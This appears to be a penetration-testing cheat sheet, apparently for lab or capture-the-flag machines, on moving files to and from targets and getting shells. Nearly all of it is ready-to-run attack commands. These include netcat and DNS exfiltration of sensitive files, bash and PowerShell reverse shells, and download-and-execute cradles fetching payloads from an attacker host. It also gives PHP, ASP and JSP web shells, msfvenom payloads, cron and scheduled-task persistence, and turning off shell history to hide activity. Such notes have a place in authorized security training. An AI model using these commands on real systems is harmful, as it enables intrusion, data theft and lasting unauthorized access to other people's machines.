File Transfer Techniques
Alternative methods when HTTP servers are blocked or unreliable
Environment Setup
export ATTACKER_IP=10.10.14.X
export TARGET_IP=10.10.10.X
export LPORT=4444
Method 1: Netcat File Transfer (Most Reliable)
Upload File to Target
# On attacker (sender)
nc -w 3 $TARGET_IP $LPORT < file.exe
# On target (receiver)
nc -nlvp $LPORT > file.exe
Download File from Target
# On target (sender)
nc -w 3 $ATTACKER_IP $LPORT < sensitive_file.txt
# On attacker (receiver)
nc -nlvp $LPORT > sensitive_file.txt
Verify Transfer
# Check file size and hash
ls -la file.exe
md5sum file.exe
Method 2: Base64 Encoding (Firewall Bypass)
Small Files (< 1MB)
# On attacker - encode file
base64 -w 0 file.exe
# Copy output, then on target - decode
echo "BASE64_CONTENT_HERE" | base64 -d > file.exe
Large Files (Chunking)
# On attacker - split and encode
split -b 50000 file.exe chunk_
for chunk in chunk_*; do base64 -w 0 $chunk > $chunk.b64; done
# On target - decode and reassemble
echo "CHUNK1_BASE64" | base64 -d > chunk_aa
echo "CHUNK2_BASE64" | base64 -d > chunk_ab
cat chunk_* > file.exe
Method 3: SMB Shares (Windows Targets)
Setup SMB Server (Attacker)
# Simple SMB share
impacket-smbserver share . -smb2support
# With authentication (more reliable)
impacket-smbserver share . -smb2support -username user -password pass
Access from Windows Target
# Anonymous access
net use \\$ATTACKER_IP\share
copy \\$ATTACKER_IP\share\file.exe C:\temp\
# With authentication
net use \\$ATTACKER_IP\share /user:user pass
copy \\$ATTACKER_IP\share\file.exe C:\temp\
Method 4: Native OS Tools
Windows PowerShell
# Download file
IEX(New-Object Net.WebClient).DownloadFile('http://$ATTACKER_IP/file.exe','C:\temp\file.exe')
# Alternative PowerShell
Invoke-WebRequest -Uri http://$ATTACKER_IP/file.exe -OutFile C:\temp\file.exe
# PowerShell one-liner
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://$ATTACKER_IP/file.exe','file.exe')"
Windows Certutil
# Download using certutil
certutil -urlcache -split -f http://$ATTACKER_IP/file.exe file.exe
# Verify and cleanup cache
certutil -urlcache -split -f http://$ATTACKER_IP/file.exe delete
Linux wget/curl
# Using wget
wget http://$ATTACKER_IP/file -O file
# Using curl
curl http://$ATTACKER_IP/file -o file
# With custom User-Agent (bypass filtering)
curl -A "Mozilla/5.0" http://$ATTACKER_IP/file -o file
Method 5: HTTP Alternatives
Multiple Port Options
# Try different ports if 8000 is blocked
python3 -m http.server 8080
python3 -m http.server 9000
python3 -m http.server 443
# Bind to specific interface
python3 -m http.server 8080 --bind $ATTACKER_IP
HTTPS Server (Bypass Filtering)
# Generate self-signed certificate
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# Start HTTPS server
python3 -c "
import http.server, ssl, socketserver
httpd = socketserver.TCPServer(('', 443), http.server.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile='server.pem', server_side=True)
httpd.serve_forever()
"
FTP Server Alternative
# Start FTP server
python3 -m pyftpdlib -p 21 -w
# Download from target
wget ftp://$ATTACKER_IP/file.exe
Method 6: SSH/SCP (If Available)
SCP File Transfer
# Upload to target
scp file.exe user@$TARGET_IP:/tmp/
# Download from target
scp user@$TARGET_IP:/tmp/sensitive_file.txt .
# With custom port
scp -P 2222 file.exe user@$TARGET_IP:/tmp/
SSH Tunneling for HTTP
# Create SSH tunnel
ssh -L 8080:localhost:8080 user@$TARGET_IP
# Access local HTTP server through tunnel
Method 7: Network Pivoting & Tunneling
Ligolo-ng (Preferred Pivoting Tool)
# On attacker machine - start proxy
./proxy -selfcert
# On target machine - connect agent
./agent -connect ATTACKER_IP:11601 -ignore-cert
# In ligolo session - start tunnel
session
start
# Add route to target network
ip route add TARGET_NETWORK/24 dev ligolo
SSH Tunneling (Alternative)
# Local port forwarding
ssh -L 8080:internal_host:80 user@pivot_host
# Dynamic SOCKS proxy
ssh -D 9050 user@pivot_host
Method 8: DNS Exfiltration (Stealth)
Small Data Exfiltration
# Encode data in DNS queries (attacker listening)
nslookup $(echo "data" | base64).attacker-domain.com
# Use dnscat2 for larger transfers
dnscat2-server attacker-domain.com
Note: DNS method is complex and slow - use only when other methods fail
Troubleshooting Common Issues
HTTP Server Blocked
- Try different ports (8080, 9000, 443)
- Use HTTPS server instead of HTTP
- Switch to SMB share method
- Use base64 encoding over existing shell
File Corruption
- Compare file sizes before/after transfer
- Verify MD5 hashes:
md5sum file.exe - Check binary mode transfers
- Avoid shell interpretation (use base64 for binaries)
Large File Transfers
- Chunk files into smaller pieces
- Use compression:
gzip file.exebefore transfer - Stream directly with netcat instead of storing
- Consider multiple parallel transfers
Network Restrictions
- Test connectivity to different ports first
- Use reverse connections (target connects to attacker)
- Try UDP instead of TCP where possible
- Encode traffic to avoid detection
File Transfer Verification
Always Verify Transfers
# Check file size
ls -la file.exe
dir file.exe
# Verify hash integrity
md5sum file.exe
certutil -hashfile file.exe MD5
# Test file functionality
file file.exe
./file.exe --help
Quick Reference Commands
Windows Targets
# PowerShell download
powershell -c "iwr http://$ATTACKER_IP/file.exe -o file.exe"
# Certutil download
certutil -urlcache -f http://$ATTACKER_IP/file.exe file.exe
# SMB copy
copy \\$ATTACKER_IP\share\file.exe .
Linux Targets
# Wget download
wget http://$ATTACKER_IP/file
# Curl download
curl http://$ATTACKER_IP/file -o file
# Netcat upload
nc $ATTACKER_IP $LPORT < file
Universal Methods
# Base64 transfer (any OS)
base64 -w 0 file | nc $TARGET_IP $LPORT
# Netcat transfer (any OS)
nc -nlvp $LPORT > file # receiver
nc $TARGET_IP $LPORT < file # sender
Shell Establishment Techniques
Methods for establishing initial access and maintaining command execution
Environment Variables
export ATTACKER_IP=10.10.14.X
export TARGET_IP=10.10.10.X
export LPORT=4444
export RPORT=5555
Method 1: Reverse Shells
Linux
Busybox nc -e
busybox nc $LHOST $LPORT -e sh
Standard bash reverse shell
bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc $ATTACKER_IP $LPORT > /tmp/f
0<&196;exec 196<>/dev/tcp/LPORT; sh <&196 >&196 2>&196
Method 2: PowerShell Shells (Windows)
PowerShell Reverse Shells
Nishang PowerShell Shells
powershell "IEX(New-Object Net.WebClient).DownloadString('http://$ATTACKER_IP/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress $ATTACKER_IP -Port $LPORT"
Base64 encoded Nishang shell (bypass execution policy)
$command = "IEX(New-Object Net.WebClient).DownloadString('http://$ATTACKER_IP/shell.ps1')"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encodedCommand
Method 3: Nishang Framework
Nishang Setup
# Clone Nishang repository
git clone https://github.com/samratashok/nishang.git
cd nishang/Shells
# Modify Invoke-PowerShellTcp.ps1 (add at the end)
Invoke-PowerShellTcp -Reverse -IPAddress $ATTACKER_IP -Port $LPORT
Key Nishang Shells
# TCP Reverse Shell
Invoke-PowerShellTcp.ps1
# UDP Reverse Shell
Invoke-PowerShellUdp.ps1
# ICMP Reverse Shell (stealth)
Invoke-PowerShellIcmp.ps1
# HTTP/HTTPS Shells
Invoke-PsGcat.ps1 (Gmail-based)
Nishang Web Delivery
# Host modified shell
python3 -m http.server 80
# Execute on target
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://$ATTACKER_IP/Invoke-PowerShellTcp.ps1')"
# Alternative execution methods
powershell -c "IWR -UseBasicParsing http://$ATTACKER_IP/shell.ps1|IEX"
powershell -c "$h=new-object -com WScript.Shell;$h.run('cmd /c powershell -c IEX(New-Object Net.WebClient).DownloadString(''http://$ATTACKER_IP/shell.ps1'')')"
Method 4: Bind Shells
Linux Bind Shells
# Netcat bind shell
nc -nlvp $LPORT -e /bin/bash
# Netcat without -e flag
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash 2>&1 | nc -nlvp $LPORT > /tmp/f
# Python bind shell
python3 -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",$LPORT));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
Windows Bind Shells
# PowerShell bind shell
powershell -c "$listener = [System.Net.Sockets.TcpListener]$LPORT; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
# Connect to bind shell
nc $TARGET_IP $LPORT
Method 5: Web Shells
PHP Web Shells
# Simple PHP shell
<?php system($_GET['cmd']); ?>
# More advanced PHP shell
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
# PHP reverse shell (pentestmonkey)
# Upload php-reverse-shell.php and access via browser
ASP/ASPX Web Shells
# Simple ASP shell
<%eval request("cmd")%>
# Simple ASPX shell
<%@ Page Language="C#" %>
<% Response.Write(System.Diagnostics.Process.Start("cmd.exe","/c " + Request["cmd"]).StandardOutput.ReadToEnd()); %>
JSP Web Shells
# Simple JSP shell
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
Method 6: MSFVenom Payloads
Linux Payloads
# Linux reverse shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$LPORT -f elf > shell.elf
# Linux bind shell
msfvenom -p linux/x86/shell_bind_tcp LPORT=$LPORT -f elf > bind.elf
# Linux meterpreter
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=$LPORT -f elf > met.elf
Windows Payloads
# Windows reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$LPORT -f exe > shell.exe
# Windows meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=$LPORT -f exe > met.exe
# Windows bind shell
msfvenom -p windows/shell_bind_tcp LPORT=$LPORT -f exe > bind.exe
# PowerShell payload
msfvenom -p windows/powershell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$LPORT -f raw > shell.ps1
Method 7: Shell Upgrade Techniques
TTY Shell Upgrade (Linux)
# Python PTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
# Fully interactive TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl+Z to background shell
stty raw -echo; fg
# Press Enter twice
export TERM=xterm
PowerShell Shell Enhancement
# Get full PowerShell session
powershell -nop -ep bypass
# Import PowerShell modules
Import-Module ActiveDirectory
Import-Module ServerManager
# Enable PowerShell remoting
Enable-PSRemoting -Force
Method 8: Persistence Mechanisms
Linux Cron Jobs
# Add reverse shell to crontab
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/$LPORT 0>&1'" | crontab -
# System-wide cron job
echo "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/$LPORT 0>&1'" >> /etc/crontab
Windows Scheduled Tasks
# Create scheduled task for reverse shell
schtasks /create /tn "SystemUpdate" /tr "powershell -c IEX(New-Object Net.WebClient).DownloadString('http://$ATTACKER_IP/shell.ps1')" /sc minute /mo 5
# Create service for persistence
sc create evil binpath= "cmd.exe /c powershell -c IEX(New-Object Net.WebClient).DownloadString('http://$ATTACKER_IP/shell.ps1')"
Method 9: Alternative Shells
Socat Shells
# Socat reverse shell (Linux)
socat TCP:$ATTACKER_IP:$LPORT EXEC:/bin/bash
# Socat bind shell (Linux)
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:/bin/bash,pty,stderr,setsid,sigint,sane
# Socat encrypted shell
# Generate certificate: openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
# Combine: cat shell.key shell.crt > shell.pem
socat OPENSSL-LISTEN:$LPORT,cert=shell.pem,verify=0,fork EXEC:/bin/bash
OpenSSL Shells
# Generate SSL certificate
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
# SSL reverse shell (attacker listener)
openssl s_server -quiet -key key.pem -cert cert.pem -port $LPORT
# SSL reverse shell (target)
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect $ATTACKER_IP:$LPORT > /tmp/s; rm /tmp/s
Shell Listener Setup
Netcat Listeners
# Basic netcat listener
nc -nlvp $LPORT
# Netcat with logging
nc -nlvp $LPORT | tee shell.log
# Multiple connection support
while true; do nc -nlvp $LPORT; done
Metasploit Listeners
# Start msfconsole
msfconsole -q
# Multi handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $ATTACKER_IP
set LPORT $LPORT
exploit -j
Socat Listeners
# Basic socat listener
socat file:`tty`,raw,echo=0 TCP-LISTEN:$LPORT
# SSL socat listener
socat OPENSSL:$TARGET_IP:$LPORT,verify=0 -
Troubleshooting Shell Issues
Common Problems
- Shell dies immediately: Check firewall rules, try different ports
- No TTY: Upgrade shell using Python PTY or other methods
- Limited commands: Try different shell types (sh, bash, cmd, powershell)
- Connection filtered: Use encrypted shells (SSL/TLS) or alternative protocols
Shell Stabilization
# Set proper terminal
export TERM=xterm
# Set terminal size
stty rows 38 columns 116
# Enable history and tab completion
export HISTFILE=/dev/null
set +o history
Integration with File Transfer
Shell + File Transfer Workflow
# 1. Establish initial shell
nc -nlvp $LPORT
# 2. Upgrade shell for file transfer
python3 -c 'import pty; pty.spawn("/bin/bash")'
# 3. Transfer tools using established methods
wget http://$ATTACKER_IP/linpeas.sh
# 4. Execute and exfiltrate results
./linpeas.sh | nc $ATTACKER_IP $RPORT
File Transfer in Restricted Shells
# Use base64 when shell has limitations
base64 -w 0 /path/to/file
# Copy output and decode on attacker machine
Next Steps
Once file transfer is established:
- Upload enumeration tools (LinPEAS, WinPEAS)
- Download sensitive files for analysis
- Transfer exploit payloads for privilege escalation
- Backup important findings before making changes